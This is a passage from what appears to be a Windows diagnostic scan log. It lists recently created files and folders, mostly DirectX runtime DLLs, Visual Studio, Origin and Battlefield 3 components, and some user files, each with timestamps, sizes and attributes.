2016-07-02 14:22 - 2016-07-02 14:22 - 00000000 ____D C:\Program Files (x86)\Microsoft Help Viewer
2016-07-02 14:20 - 2016-07-16 13:20 - 00000000 ____D C:\Windows\SysWOW64\1033
2016-07-02 14:20 - 2016-07-02 15:37 - 00000000 ____D C:\Program Files\Microsoft SQL Server
2016-07-02 14:20 - 2016-07-02 15:37 - 00000000 ____D C:\Program Files (x86)\Microsoft SQL Server
2016-07-02 14:17 - 2016-07-16 13:35 - 00000000 ____D C:\Windows\system32\1033
2016-07-02 14:17 - 2016-07-02 14:17 - 00000000 ____H C:\Windows\system32\Drivers\Msft_User_SensorsSimulatorDriver_01_11_00.Wdf
2016-07-02 14:13 - 2016-07-16 13:23 - 00000000 ____D C:\Program Files (x86)\Microsoft Visual Studio 14.0
2016-07-02 14:13 - 2016-07-16 13:21 - 00000000 ____D C:\Program Files (x86)\Microsoft SDKs
2016-07-02 14:01 - 2016-07-02 14:01 - 00000000 ____D C:\ProgramData\VsTelemetry
2016-06-29 16:58 - 2016-07-18 01:00 - 00000000 _RSHD C:\Users\User not found\AppData\Roaming\WindowsServices
2016-06-28 16:33 - 2016-07-02 15:52 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox
2016-06-27 17:18 - 2016-07-04 16:33 - 00000000 ____D C:\Users\User not found\Documents\Battlefield 3
2016-06-25 18:16 - 2016-06-28 16:43 - 00000000 ____D C:\ProgramData\EA Logs
2016-06-25 18:16 - 2016-06-25 18:16 - 00000000 ____D C:\ProgramData\EA Core
2016-06-23 21:38 - 2016-06-23 21:38 - 00001186 _____ C:\Users\Public\Desktop\Battlefield 3.lnk
2016-06-23 21:38 - 2016-06-23 21:38 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Battlefield 3
2016-06-23 21:21 - 2016-07-04 16:33 - 00280904 _____ C:\Windows\SysWOW64\PnkBstrB.exe
2016-06-23 21:21 - 2016-06-23 21:38 - 00189248 _____ C:\Windows\SysWOW64\PnkBstrB.ex0
2016-06-23 21:21 - 2016-06-23 21:38 - 00075136 _____ C:\Windows\SysWOW64\PnkBstrA.exe
2016-06-23 21:21 - 2010-06-02 04:55 - 00527192 _____ (Microsoft Corporation) C:\Windows\SysWOW64\XAudio2_7.dll
2016-06-23 21:21 - 2010-06-02 04:55 - 00518488 _____ (Microsoft Corporation) C:\Windows\system32\XAudio2_7.dll
2016-06-23 21:21 - 2010-06-02 04:55 - 00239960 _____ (Microsoft Corporation) C:\Windows\SysWOW64\xactengine3_7.dll
2016-06-23 21:21 - 2010-06-02 04:55 - 00176984 _____ (Microsoft Corporation) C:\Windows\system32\xactengine3_7.dll
2016-06-23 21:21 - 2010-06-02 04:55 - 00077656 _____ (Microsoft Corporation) C:\Windows\system32\XAPOFX1_5.dll
2016-06-23 21:21 - 2010-06-02 04:55 - 00074072 _____ (Microsoft Corporation) C:\Windows\SysWOW64\XAPOFX1_5.dll
2016-06-23 21:21 - 2010-05-26 11:41 - 02526056 _____ (Microsoft Corporation) C:\Windows\system32\D3DCompiler_43.dll
2016-06-23 21:21 - 2010-05-26 11:41 - 02401112 _____ (Microsoft Corporation) C:\Windows\system32\D3DX9_43.dll
2016-06-23 21:21 - 2010-05-26 11:41 - 02106216 _____ (Microsoft Corporation) C:\Windows\SysWOW64\D3DCompiler_43.dll
2016-06-23 21:21 - 2010-05-26 11:41 - 01998168 _____ (Microsoft Corporation) C:\Windows\SysWOW64\D3DX9_43.dll
2016-06-23 21:21 - 2010-05-26 11:41 - 01907552 _____ (Microsoft Corporation) C:\Windows\system32\d3dcsx_43.dll
2016-06-23 21:21 - 2010-05-26 11:41 - 01868128 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dcsx_43.dll
2016-06-23 21:21 - 2010-05-26 11:41 - 00511328 _____ (Microsoft Corporation) C:\Windows\system32\d3dx10_43.dll
2016-06-23 21:21 - 2010-05-26 11:41 - 00470880 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dx10_43.dll
2016-06-23 21:21 - 2010-05-26 11:41 - 00276832 _____ (Microsoft Corporation) C:\Windows\system32\d3dx11_43.dll
2016-06-23 21:21 - 2010-05-26 11:41 - 00248672 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dx11_43.dll
2016-06-23 21:21 - 2010-02-04 10:01 - 00530776 _____ (Microsoft Corporation) C:\Windows\system32\XAudio2_6.dll
2016-06-23 21:21 - 2010-02-04 10:01 - 00528216 _____ (Microsoft Corporation) C:\Windows\SysWOW64\XAudio2_6.dll
2016-06-23 21:21 - 2010-02-04 10:01 - 00238936 _____ (Microsoft Corporation) C:\Windows\SysWOW64\xactengine3_6.dll
2016-06-23 21:21 - 2010-02-04 10:01 - 00176984 _____ (Microsoft Corporation) C:\Windows\system32\xactengine3_6.dll
2016-06-23 21:21 - 2010-02-04 10:01 - 00078680 _____ (Microsoft Corporation) C:\Windows\system32\XAPOFX1_4.dll
2016-06-23 21:21 - 2010-02-04 10:01 - 00074072 _____ (Microsoft Corporation) C:\Windows\SysWOW64\XAPOFX1_4.dll
2016-06-23 21:21 - 2010-02-04 10:01 - 00024920 _____ (Microsoft Corporation) C:\Windows\system32\X3DAudio1_7.dll
2016-06-23 21:21 - 2010-02-04 10:01 - 00022360 _____ (Microsoft Corporation) C:\Windows\SysWOW64\X3DAudio1_7.dll
2016-06-23 21:21 - 2009-09-04 17:44 - 00517960 _____ (Microsoft Corporation) C:\Windows\system32\XAudio2_5.dll
2016-06-23 21:21 - 2009-09-04 17:44 - 00515416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\XAudio2_5.dll
2016-06-23 21:21 - 2009-09-04 17:44 - 00238936 _____ (Microsoft Corporation) C:\Windows\SysWOW64\xactengine3_5.dll
2016-06-23 21:21 - 2009-09-04 17:44 - 00176968 _____ (Microsoft Corporation) C:\Windows\system32\xactengine3_5.dll
2016-06-23 21:21 - 2009-09-04 17:44 - 00073544 _____ (Microsoft Corporation) C:\Windows\system32\XAPOFX1_3.dll
2016-06-23 21:21 - 2009-09-04 17:44 - 00069464 _____ (Microsoft Corporation) C:\Windows\SysWOW64\XAPOFX1_3.dll
2016-06-23 21:21 - 2009-09-04 17:29 - 05554512 _____ (Microsoft Corporation) C:\Windows\system32\d3dcsx_42.dll
2016-06-23 21:21 - 2009-09-04 17:29 - 05501792 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dcsx_42.dll
2016-06-23 21:21 - 2009-09-04 17:29 - 02582888 _____ (Microsoft Corporation) C:\Windows\system32\D3DCompiler_42.dll
2016-06-23 21:21 - 2009-09-04 17:29 - 02475352 _____ (Microsoft Corporation) C:\Windows\system32\D3DX9_42.dll
2016-06-23 21:21 - 2009-09-04 17:29 - 01974616 _____ (Microsoft Corporation) C:\Windows\SysWOW64\D3DCompiler_42.dll
2016-06-23 21:21 - 2009-09-04 17:29 - 01892184 _____ (Microsoft Corporation) C:\Windows\SysWOW64\D3DX9_42.dll
2016-06-23 21:21 - 2009-09-04 17:29 - 00523088 _____ (Microsoft Corporation) C:\Windows\system32\d3dx10_42.dll
2016-06-23 21:21 - 2009-09-04 17:29 - 00453456 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dx10_42.dll
2016-06-23 21:21 - 2009-09-04 17:29 - 00285024 _____ (Microsoft Corporation) C:\Windows\system32\d3dx11_42.dll
2016-06-23 21:21 - 2009-09-04 17:29 - 00235344 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dx11_42.dll
2016-06-23 21:21 - 2009-03-16 14:18 - 00521560 _____ (Microsoft Corporation) C:\Windows\system32\XAudio2_4.dll
2016-06-23 21:21 - 2009-03-16 14:18 - 00517448 _____ (Microsoft Corporation) C:\Windows\SysWOW64\XAudio2_4.dll
2016-06-23 21:21 - 2009-03-16 14:18 - 00235352 _____ (Microsoft Corporation) C:\Windows\SysWOW64\xactengine3_4.dll
2016-06-23 21:21 - 2009-03-16 14:18 - 00174936 _____ (Microsoft Corporation) C:\Windows\system32\xactengine3_4.dll
2016-06-23 21:21 - 2009-03-16 14:18 - 00024920 _____ (Microsoft Corporation) C:\Windows\system32\X3DAudio1_6.dll
2016-06-23 21:21 - 2009-03-16 14:18 - 00022360 _____ (Microsoft Corporation) C:\Windows\SysWOW64\X3DAudio1_6.dll
2016-06-23 21:21 - 2009-03-09 15:27 - 05425496 _____ (Microsoft Corporation) C:\Windows\system32\D3DX9_41.dll
2016-06-23 21:21 - 2009-03-09 15:27 - 04178264 _____ (Microsoft Corporation) C:\Windows\SysWOW64\D3DX9_41.dll
2016-06-23 21:21 - 2009-03-09 15:27 - 02430312 _____ (Microsoft Corporation) C:\Windows\system32\D3DCompiler_41.dll
2016-06-23 21:21 - 2009-03-09 15:27 - 01846632 _____ (Microsoft Corporation) C:\Windows\SysWOW64\D3DCompiler_41.dll
2016-06-23 21:21 - 2009-03-09 15:27 - 00520544 _____ (Microsoft Corporation) C:\Windows\system32\d3dx10_41.dll
2016-06-23 21:21 - 2009-03-09 15:27 - 00453456 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dx10_41.dll
2016-06-23 21:21 - 2008-10-27 10:04 - 00518480 _____ (Microsoft Corporation) C:\Windows\system32\XAudio2_3.dll
2016-06-23 21:21 - 2008-10-27 10:04 - 00514384 _____ (Microsoft Corporation) C:\Windows\SysWOW64\XAudio2_3.dll
2016-06-23 21:21 - 2008-10-27 10:04 - 00235856 _____ (Microsoft Corporation) C:\Windows\SysWOW64\xactengine3_3.dll
2016-06-23 21:21 - 2008-10-27 10:04 - 00175440 _____ (Microsoft Corporation) C:\Windows\system32\xactengine3_3.dll
2016-06-23 21:21 - 2008-10-27 10:04 - 00074576 _____ (Microsoft Corporation) C:\Windows\system32\XAPOFX1_2.dll
2016-06-23 21:21 - 2008-10-27 10:04 - 00070992 _____ (Microsoft Corporation) C:\Windows\SysWOW64\XAPOFX1_2.dll
2016-06-23 21:21 - 2008-10-27 10:04 - 00025936 _____ (Microsoft Corporation) C:\Windows\system32\X3DAudio1_5.dll
2016-06-23 21:21 - 2008-10-27 10:04 - 00023376 _____ (Microsoft Corporation) C:\Windows\SysWOW64\X3DAudio1_5.dll
2016-06-23 21:21 - 2008-10-15 06:22 - 05631312 _____ (Microsoft Corporation) C:\Windows\system32\D3DX9_40.dll
2016-06-23 21:21 - 2008-10-15 06:22 - 04379984 _____ (Microsoft Corporation) C:\Windows\SysWOW64\D3DX9_40.dll
2016-06-23 21:21 - 2008-10-15 06:22 - 02605920 _____ (Microsoft Corporation) C:\Windows\system32\D3DCompiler_40.dll
2016-06-23 21:21 - 2008-10-15 06:22 - 02036576 _____ (Microsoft Corporation) C:\Windows\SysWOW64\D3DCompiler_40.dll
2016-06-23 21:21 - 2008-10-15 06:22 - 00519000 _____ (Microsoft Corporation) C:\Windows\system32\d3dx10_40.dll
2016-06-23 21:21 - 2008-10-15 06:22 - 00452440 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dx10_40.dll
2016-06-23 21:21 - 2008-07-31 10:41 - 00238088 _____ (Microsoft Corporation) C:\Windows\SysWOW64\xactengine3_2.dll
2016-06-23 21:21 - 2008-07-31 10:41 - 00177672 _____ (Microsoft Corporation) C:\Windows\system32\xactengine3_2.dll
2016-06-23 21:21 - 2008-07-31 10:41 - 00072200 _____ (Microsoft Corporation) C:\Windows\system32\XAPOFX1_1.dll
2016-06-23 21:21 - 2008-07-31 10:41 - 00068616 _____ (Microsoft Corporation) C:\Windows\SysWOW64\XAPOFX1_1.dll
2016-06-23 21:21 - 2008-07-31 10:40 - 00513544 _____ (Microsoft Corporation) C:\Windows\system32\XAudio2_2.dll
2016-06-23 21:21 - 2008-07-31 10:40 - 00509448 _____ (Microsoft Corporation) C:\Windows\SysWOW64\XAudio2_2.dll
2016-06-23 21:21 - 2008-07-10 11:01 - 00467984 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dx10_39.dll
2016-06-23 21:21 - 2008-07-10 11:00 - 04992520 _____ (Microsoft Corporation) C:\Windows\system32\D3DX9_39.dll
2016-06-23 21:21 - 2008-07-10 11:00 - 03851784 _____ (Microsoft Corporation) C:\Windows\SysWOW64\D3DX9_39.dll
2016-06-23 21:21 - 2008-07-10 11:00 - 01942552 _____ (Microsoft Corporation) C:\Windows\system32\D3DCompiler_39.dll
2016-06-23 21:21 - 2008-07-10 11:00 - 01493528 _____ (Microsoft Corporation) C:\Windows\SysWOW64\D3DCompiler_39.dll
2016-06-23 21:21 - 2008-07-10 11:00 - 00540688 _____ (Microsoft Corporation) C:\Windows\system32\d3dx10_39.dll
2016-06-23 21:20 - 2008-05-30 14:19 - 00511496 _____ (Microsoft Corporation) C:\Windows\system32\XAudio2_1.dll
2016-06-23 21:20 - 2008-05-30 14:19 - 00507400 _____ (Microsoft Corporation) C:\Windows\SysWOW64\XAudio2_1.dll
2016-06-23 21:20 - 2008-05-30 14:18 - 00238088 _____ (Microsoft Corporation) C:\Windows\SysWOW64\xactengine3_1.dll
2016-06-23 21:20 - 2008-05-30 14:18 - 00177672 _____ (Microsoft Corporation) C:\Windows\system32\xactengine3_1.dll
2016-06-23 21:20 - 2008-05-30 14:17 - 00068104 _____ (Microsoft Corporation) C:\Windows\system32\XAPOFX1_0.dll
2016-06-23 21:20 - 2008-05-30 14:17 - 00065032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\XAPOFX1_0.dll
2016-06-23 21:20 - 2008-05-30 14:17 - 00025608 _____ (Microsoft Corporation) C:\Windows\SysWOW64\X3DAudio1_4.dll
2016-06-23 21:20 - 2008-05-30 14:16 - 00028168 _____ (Microsoft Corporation) C:\Windows\system32\X3DAudio1_4.dll
2016-06-23 21:20 - 2008-05-30 14:11 - 04991496 _____ (Microsoft Corporation) C:\Windows\system32\D3DX9_38.dll
2016-06-23 21:20 - 2008-05-30 14:11 - 03850760 _____ (Microsoft Corporation) C:\Windows\SysWOW64\D3DX9_38.dll
2016-06-23 21:20 - 2008-05-30 14:11 - 01941528 _____ (Microsoft Corporation) C:\Windows\system32\D3DCompiler_38.dll
2016-06-23 21:20 - 2008-05-30 14:11 - 01491992 _____ (Microsoft Corporation) C:\Windows\SysWOW64\D3DCompiler_38.dll
2016-06-23 21:20 - 2008-05-30 14:11 - 00540688 _____ (Microsoft Corporation) C:\Windows\system32\d3dx10_38.dll
2016-06-23 21:20 - 2008-05-30 14:11 - 00467984 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dx10_38.dll
2016-06-23 21:20 - 2008-03-05 16:04 - 00489480 _____ (Microsoft Corporation) C:\Windows\system32\XAudio2_0.dll
2016-06-23 21:20 - 2008-03-05 16:03 - 00479752 _____ (Microsoft Corporation) C:\Windows\SysWOW64\XAudio2_0.dll
2016-06-23 21:20 - 2008-03-05 16:03 - 00238088 _____ (Microsoft Corporation) C:\Windows\SysWOW64\xactengine3_0.dll
2016-06-23 21:20 - 2008-03-05 16:03 - 00177672 _____ (Microsoft Corporation) C:\Windows\system32\xactengine3_0.dll
2016-06-23 21:20 - 2008-03-05 16:00 - 00028168 _____ (Microsoft Corporation) C:\Windows\system32\X3DAudio1_3.dll
2016-06-23 21:20 - 2008-03-05 16:00 - 00025608 _____ (Microsoft Corporation) C:\Windows\SysWOW64\X3DAudio1_3.dll
2016-06-23 21:20 - 2008-03-05 15:56 - 04910088 _____ (Microsoft Corporation) C:\Windows\system32\D3DX9_37.dll
2016-06-23 21:20 - 2008-03-05 15:56 - 03786760 _____ (Microsoft Corporation) C:\Windows\SysWOW64\D3DX9_37.dll
2016-06-23 21:20 - 2008-03-05 15:56 - 01860120 _____ (Microsoft Corporation) C:\Windows\system32\D3DCompiler_37.dll
2016-06-23 21:20 - 2008-03-05 15:56 - 01420824 _____ (Microsoft Corporation) C:\Windows\SysWOW64\D3DCompiler_37.dll
2016-06-23 21:20 - 2008-02-05 23:07 - 00529424 _____ (Microsoft Corporation) C:\Windows\system32\d3dx10_37.dll
2016-06-23 21:20 - 2008-02-05 23:07 - 00462864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dx10_37.dll
2016-06-23 21:20 - 2007-10-22 03:40 - 00411656 _____ (Microsoft Corporation) C:\Windows\system32\xactengine2_10.dll
2016-06-23 21:20 - 2007-10-22 03:39 - 00267272 _____ (Microsoft Corporation) C:\Windows\SysWOW64\xactengine2_10.dll
2016-06-23 21:20 - 2007-10-22 03:37 - 00021000 _____ (Microsoft Corporation) C:\Windows\system32\X3DAudio1_2.dll
2016-06-23 21:20 - 2007-10-22 03:37 - 00017928 _____ (Microsoft Corporation) C:\Windows\SysWOW64\X3DAudio1_2.dll
2016-06-23 21:20 - 2007-10-12 15:14 - 05081608 _____ (Microsoft Corporation) C:\Windows\system32\d3dx9_36.dll
2016-06-23 21:20 - 2007-10-12 15:14 - 03734536 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dx9_36.dll
2016-06-23 21:20 - 2007-10-12 15:14 - 02006552 _____ (Microsoft Corporation) C:\Windows\system32\D3DCompiler_36.dll
2016-06-23 21:20 - 2007-10-12 15:14 - 01374232 _____ (Microsoft Corporation) C:\Windows\SysWOW64\D3DCompiler_36.dll
2016-06-23 21:20 - 2007-10-02 09:56 - 00508264 _____ (Microsoft Corporation) C:\Windows\system32\d3dx10_36.dll
2016-06-23 21:20 - 2007-10-02 09:56 - 00444776 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dx10_36.dll
2016-06-23 21:20 - 2007-07-20 00:57 - 00411496 _____ (Microsoft Corporation) C:\Windows\system32\xactengine2_9.dll
2016-06-23 21:20 - 2007-07-20 00:57 - 00267112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\xactengine2_9.dll
2016-06-23 21:20 - 2007-07-19 18:14 - 05073256 _____ (Microsoft Corporation) C:\Windows\system32\d3dx9_35.dll
2016-06-23 21:20 - 2007-07-19 18:14 - 03727720 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dx9_35.dll
2016-06-23 21:20 - 2007-07-19 18:14 - 01985904 _____ (Microsoft Corporation) C:\Windows\system32\D3DCompiler_35.dll
2016-06-23 21:20 - 2007-07-19 18:14 - 01358192 _____ (Microsoft Corporation) C:\Windows\SysWOW64\D3DCompiler_35.dll
2016-06-23 21:20 - 2007-07-19 18:14 - 00508264 _____ (Microsoft Corporation) C:\Windows\system32\d3dx10_35.dll
2016-06-23 21:20 - 2007-07-19 18:14 - 00444776 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dx10_35.dll
2016-06-23 21:20 - 2007-06-20 20:49 - 00409960 _____ (Microsoft Corporation) C:\Windows\system32\xactengine2_8.dll
2016-06-23 21:20 - 2007-06-20 20:46 - 00266088 _____ (Microsoft Corporation) C:\Windows\SysWOW64\xactengine2_8.dll
2016-06-23 21:20 - 2007-05-16 16:45 - 04496232 _____ (Microsoft Corporation) C:\Windows\system32\d3dx9_34.dll
2016-06-23 21:20 - 2007-05-16 16:45 - 03497832 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dx9_34.dll
2016-06-23 21:20 - 2007-05-16 16:45 - 01401200 _____ (Microsoft Corporation) C:\Windows\system32\D3DCompiler_34.dll
2016-06-23 21:20 - 2007-05-16 16:45 - 01124720 _____ (Microsoft Corporation) C:\Windows\SysWOW64\D3DCompiler_34.dll
2016-06-23 21:20 - 2007-05-16 16:45 - 00506728 _____ (Microsoft Corporation) C:\Windows\system32\d3dx10_34.dll
2016-06-23 21:20 - 2007-05-16 16:45 - 00443752 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dx10_34.dll
2016-06-23 21:20 - 2007-04-04 18:55 - 00403304 _____ (Microsoft Corporation) C:\Windows\system32\xactengine2_7.dll
2016-06-23 21:20 - 2007-04-04 18:55 - 00261480 _____ (Microsoft Corporation) C:\Windows\SysWOW64\xactengine2_7.dll
2016-06-23 21:20 - 2007-04-04 18:54 - 00107368 _____ (Microsoft Corporation) C:\Windows\system32\xinput1_3.dll
2016-06-23 21:20 - 2007-04-04 18:53 - 00081768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\xinput1_3.dll
2016-06-23 21:20 - 2007-03-15 16:57 - 00506728 _____ (Microsoft Corporation) C:\Windows\system32\d3dx10_33.dll
2016-06-23 21:20 - 2007-03-15 16:57 - 00443752 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dx10_33.dll
2016-06-23 21:20 - 2007-03-12 16:42 - 04494184 _____ (Microsoft Corporation) C:\Windows\system32\d3dx9_33.dll
2016-06-23 21:20 - 2007-03-12 16:42 - 03495784 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dx9_33.dll
2016-06-23 21:20 - 2007-03-12 16:42 - 01400176 _____ (Microsoft Corporation) C:\Windows\system32\D3DCompiler_33.dll
2016-06-23 21:20 - 2007-03-12 16:42 - 01123696 _____ (Microsoft Corporation) C:\Windows\SysWOW64\D3DCompiler_33.dll
2016-06-23 21:20 - 2007-03-05 12:42 - 00017688 _____ (Microsoft Corporation) C:\Windows\system32\x3daudio1_1.dll
2016-06-23 21:20 - 2007-03-05 12:42 - 00015128 _____ (Microsoft Corporation) C:\Windows\SysWOW64\x3daudio1_1.dll
2016-06-23 21:20 - 2007-01-24 15:27 - 00393576 _____ (Microsoft Corporation) C:\Windows\system32\xactengine2_6.dll
2016-06-23 21:20 - 2007-01-24 15:27 - 00255848 _____ (Microsoft Corporation) C:\Windows\SysWOW64\xactengine2_6.dll
2016-06-23 21:20 - 2006-12-08 12:02 - 00251672 _____ (Microsoft Corporation) C:\Windows\SysWOW64\xactengine2_5.dll
2016-06-23 21:20 - 2006-12-08 12:00 - 00390424 _____ (Microsoft Corporation) C:\Windows\system32\xactengine2_5.dll
2016-06-23 21:20 - 2006-11-29 13:06 - 04398360 _____ (Microsoft Corporation) C:\Windows\system32\d3dx9_32.dll
2016-06-23 21:20 - 2006-11-29 13:06 - 03426072 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dx9_32.dll
2016-06-23 21:20 - 2006-11-29 13:06 - 00469264 _____ (Microsoft Corporation) C:\Windows\system32\d3dx10.dll
2016-06-23 21:20 - 2006-11-29 13:06 - 00440080 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dx10.dll
2016-06-23 21:20 - 2006-09-28 16:05 - 03977496 _____ (Microsoft Corporation) C:\Windows\system32\d3dx9_31.dll
2016-06-23 21:20 - 2006-09-28 16:05 - 02414360 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dx9_31.dll
2016-06-23 21:20 - 2006-09-28 16:05 - 00237848 _____ (Microsoft Corporation) C:\Windows\SysWOW64\xactengine2_4.dll
2016-06-23 21:20 - 2006-09-28 16:04 - 00364824 _____ (Microsoft Corporation) C:\Windows\system32\xactengine2_4.dll
2016-06-23 21:20 - 2006-07-28 09:31 - 00083736 _____ (Microsoft Corporation) C:\Windows\system32\xinput1_2.dll
2016-06-23 21:20 - 2006-07-28 09:30 - 00363288 _____ (Microsoft Corporation) C:\Windows\system32\xactengine2_3.dll
2016-06-23 21:20 - 2006-07-28 09:30 - 00236824 _____ (Microsoft Corporation) C:\Windows\SysWOW64\xactengine2_3.dll
2016-06-23 21:20 - 2006-07-28 09:30 - 00062744 _____ (Microsoft Corporation) C:\Windows\SysWOW64\xinput1_2.dll
2016-06-23 21:20 - 2006-05-31 07:24 - 00230168 _____ (Microsoft Corporation) C:\Windows\SysWOW64\xactengine2_2.dll
2016-06-23 21:20 - 2006-05-31 07:22 - 00354072 _____ (Microsoft Corporation) C:\Windows\system32\xactengine2_2.dll
2016-06-23 21:20 - 2006-03-31 12:41 - 03927248 _____ (Microsoft Corporation) C:\Windows\system32\d3dx9_30.dll
2016-06-23 21:20 - 2006-03-31 12:40 - 02388176 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dx9_30.dll
2016-06-23 21:20 - 2006-03-31 12:40 - 00352464 _____ (Microsoft Corporation) C:\Windows\system32\xactengine2_1.dll
2016-06-23 21:20 - 2006-03-31 12:39 - 00229584 _____ (Microsoft Corporation) C:\Windows\SysWOW64\xactengine2_1.dll
2016-06-23 21:20 - 2006-03-31 12:39 - 00083664 _____ (Microsoft Corporation) C:\Windows\system32\xinput1_1.dll
2016-06-23 21:20 - 2006-03-31 12:39 - 00062672 _____ (Microsoft Corporation) C:\Windows\SysWOW64\xinput1_1.dll
2016-06-23 21:20 - 2006-02-03 08:43 - 03830992 _____ (Microsoft Corporation) C:\Windows\system32\d3dx9_29.dll
2016-06-23 21:20 - 2006-02-03 08:43 - 02332368 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dx9_29.dll
2016-06-23 21:20 - 2006-02-03 08:42 - 00355536 _____ (Microsoft Corporation) C:\Windows\system32\xactengine2_0.dll
2016-06-23 21:20 - 2006-02-03 08:42 - 00230096 _____ (Microsoft Corporation) C:\Windows\SysWOW64\xactengine2_0.dll
2016-06-23 21:20 - 2006-02-03 08:41 - 00016592 _____ (Microsoft Corporation) C:\Windows\system32\x3daudio1_0.dll
2016-06-23 21:20 - 2006-02-03 08:41 - 00014032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\x3daudio1_0.dll
2016-06-23 21:20 - 2005-12-05 18:09 - 03815120 _____ (Microsoft Corporation) C:\Windows\system32\d3dx9_28.dll
2016-06-23 21:20 - 2005-12-05 18:09 - 02323664 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dx9_28.dll
2016-06-23 21:20 - 2005-07-22 19:59 - 03807440 _____ (Microsoft Corporation) C:\Windows\system32\d3dx9_27.dll
2016-06-23 21:20 - 2005-07-22 19:59 - 02319568 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dx9_27.dll
2016-06-23 21:20 - 2005-05-26 15:34 - 03767504 _____ (Microsoft Corporation) C:\Windows\system32\d3dx9_26.dll
2016-06-23 21:20 - 2005-05-26 15:34 - 02297552 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dx9_26.dll
2016-06-23 21:20 - 2005-03-18 17:19 - 03823312 _____ (Microsoft Corporation) C:\Windows\system32\d3dx9_25.dll
2016-06-23 21:20 - 2005-03-18 17:19 - 02337488 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dx9_25.dll
2016-06-23 21:20 - 2005-02-05 19:45 - 03544272 _____ (Microsoft Corporation) C:\Windows\system32\d3dx9_24.dll
2016-06-23 21:20 - 2005-02-05 19:45 - 02222800 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dx9_24.dll
2016-06-23 20:12 - 2016-06-27 17:18 - 00000000 ____D C:\Users\User not found\AppData\Roaming\Origin
2016-06-23 20:12 - 2016-06-23 20:13 - 00000000 ____D C:\Program Files (x86)\Origin Games
2016-06-23 20:11 - 2016-06-27 17:18 - 00000000 ____D C:\Users\User not found\AppData\Local\Origin
2016-06-23 19:54 - 2016-07-04 16:30 - 00000000 ____D C:\ProgramData\Origin
2016-06-23 19:54 - 2016-06-23 19:54 - 00000991 _____ C:\Users\Public\Desktop\Origin.lnk
2016-06-23 19:54 - 2016-06-23 19:54 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Origin
2016-06-23 19:54 - 2016-06-23 19:54 - 00000000 ____D C:\ProgramData\Electronic Arts
2016-06-23 19:53 - 2016-07-16 13:35 - 00000000 ____D C:\ProgramData\Package Cache
2016-06-23 19:52 - 2016-06-23 20:11 - 00000000 ____D C:\Program Files (x86)\Origin
2016-06-23 19:34 - 2016-07-18 13:20 - 00000830 _____ C:\Windows\Tasks\Adobe Flash Player Updater.job
2016-06-23 19:34 - 2016-07-12 19:20 - 00003718 _____ C:\Windows\System32\Tasks\Adobe Flash Player Updater
2016-06-21 17:20 - 2016-07-13 15:43 - 00000000 ____D C:\Users\User not found\Documents\Sony Vegas - Voice Record
2016-06-21 17:06 - 2016-07-02 21:13 - 00000132 _____ C:\Users\User not found\AppData\Roaming\Adobe PNG Format CS6 Prefs
2016-06-21 16:55 - 2016-06-21 16:55 - 00000000 ____D C:\Users\User not found\AppData\LocalLow\Adobe
2016-06-21 16:33 - 2016-06-21 16:34 - 362168352 _____ C:\Users\User not found\Downloads\Rocket League®_20160621003625.mp4
2016-06-21 16:12 - 2016-06-21 16:12 - 00000000 ____D C:\Users\User not found\AppData\Local\GWX
2016-06-20 19:00 - 2016-06-27 21:57 - 00000122 _____ C:\Users\User not found\Desktop\Musicas.txt
2016-06-20 16:11 - 2016-06-20 16:11 - 00000219 _____ C:\Users\User not found\Desktop\Counter-Strike Global Offensive.url
2016-06-20 16:11 - 2016-06-20 16:11 - 00000000 ____D C:\Users\User not found\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Steam
2016-06-20 14:45 - 2016-06-20 14:45 - 00226472 _____ (Microsoft Corporation) C:\Windows\SysWOW64\VSPerf140.dll
2016-06-20 14:22 - 2016-06-20 14:30 - 00000000 ___SD C:\Windows\system32\GWX
2016-06-20 14:22 - 2016-06-20 14:22 - 00000000 ___SD C:\Windows\SysWOW64\GWX
2016-06-20 14:22 - 2016-06-20 14:22 - 00000000 ____D C:\Windows\system32\appraiser
2016-06-20 13:51 - 2016-06-20 13:51 - 00279720 _____ (Microsoft Corporation) C:\Windows\system32\VSPerf140.dll
2016-06-20 13:34 - 2016-06-20 13:34 - 00000000 ____H C:\Windows\system32\Drivers\Msft_Kernel_iBtFltCoex_01009.Wdf
2016-06-20 13:31 - 2016-06-20 13:31 - 00000000 ____D C:\iBTWU
2016-06-20 13:24 - 2015-01-06 04:01 - 00072192 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ndproxy.sys
2016-06-20 13:24 - 2015-01-06 03:59 - 00080896 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\wanarp.sys
